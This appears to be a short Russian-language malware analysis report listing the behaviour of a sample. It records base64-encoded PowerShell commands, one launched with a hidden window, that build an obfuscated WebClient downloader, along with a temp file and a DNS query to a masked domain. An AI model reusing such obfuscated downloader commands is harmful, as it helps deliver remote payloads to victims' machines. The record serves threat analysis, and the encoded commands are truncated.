Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAHcAUQBEAG8AWAA9ACgAJwBEAEEAXwB4AHcAQQAnACsAJwBEACcAKwAnAHcAJwApADsAJABNAEEAQwBBAFUAQgBvAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1472
- %TEMP%\1241908.cvr
- DNS ASK mk######a7094maybelle.email
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAHcAUQBEAG8AWAA9ACgAJwBEAEEAXwB4AHcAQQAnACsAJwBEACcAKwAnAHcAJwApADsAJABNAEEAQwBBAFUAQgBvAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AD... (со скрытым окном)